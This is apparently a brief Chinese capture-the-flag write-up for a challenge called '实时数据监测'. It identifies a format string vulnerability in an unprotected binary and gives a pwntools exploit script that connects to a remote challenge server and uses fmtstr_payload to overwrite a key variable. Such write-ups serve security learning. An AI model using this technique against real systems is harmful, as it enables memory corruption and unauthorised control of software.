实时数据监测
思路:程序是裸奔的。
漏洞是格式字符串,利用这个漏洞修改key的值,就可以了。
学会的新知识:本来想大数字覆盖一个一个来,但其实pwntools的fmtstr_payload模块就可以了。
fmtstr_payload(offset,{address:value})
exp:
#!/usr/bin/python
from pwn import *
fmt_addr=0x0804A048
p = remote("111.200.241.244",49656)
payload=fmtstr_payload(12,{fmt_addr:0x2223322})
p.send(payload)
p.interactive()